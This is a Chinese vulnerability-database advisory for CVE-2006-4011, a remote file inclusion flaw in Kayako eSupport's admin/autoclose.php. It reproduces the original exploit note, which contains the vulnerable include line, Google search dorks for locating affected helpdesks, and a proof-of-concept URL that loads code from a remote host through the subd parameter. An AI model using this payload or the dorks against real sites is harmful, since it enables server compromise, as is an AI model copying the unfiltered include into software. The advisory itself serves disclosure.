Kayako eSupport 'autoclose.php' 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110736 漏洞类型 输入验证
发布时间 2006-08-02 更新时间 2006-08-09
CVE编号 CVE-2006-4011 CNNVD-ID CNNVD-200608-092
漏洞平台 PHP CVSS评分 2.6
|漏洞来源
https://www.exploit-db.com/exploits/2115
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-092
|漏洞详情
KayakoeSupport是基于Web的后台技术支应用程序。KayakoeSupport对用户请求的处理上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上以Web进程权限执行任意命令。KayakoeSupport的esupport/admin/autoclose.php脚本没有正确的过滤subd变量参数的输入,允许攻击者通过包含本地或外部资源导致执行任意代码。相关的漏洞代码如下:require_once$subd."functions.php";
|漏洞EXP
Script: Kayako eSupport <= 2.3.1
Vendor: Kayako (www.kayako.com)
Discovered: beford <xbefordx gmail com>
Comments: It seems like the vendor silently fixed the issue in the
current version (more like since v2.3.5) withouth warning users of
previous versions, noobs. Requires that "register_globals" is enabled.
Vulnerable File: esupport/admin/autoclose.php

[code]
require_once $subd . "functions.php";
[/code]

Not-leet-enough: "Powered By Kayako eSupport"
http://www.google.com/search?q=%22Helpdesk+Powered+by+Kayako+eSupport+v2.3.1%22
http://www.google.com/search?q=%22Helpdesk+Powered+by+Kayako+eSupport+v2.2%22

POC: http://omghax.com/esupport/admin/autoclose.php?subd=http://remotefile/?

# milw0rm.com [2006-08-02]
|参考资料

来源:BID
名称:19315
链接:http://www.securityfocus.com/bid/19315
来源:SECUNIA
名称:21330
链接:http://secunia.com/advisories/21330
来源:MILW0RM
名称:2115
链接:http://milw0rm.com/exploits/2115
来源:XF
名称:esupport-autoclose-file-include(28199)
链接:http://xforce.iss.net/xforce/xfdb/28199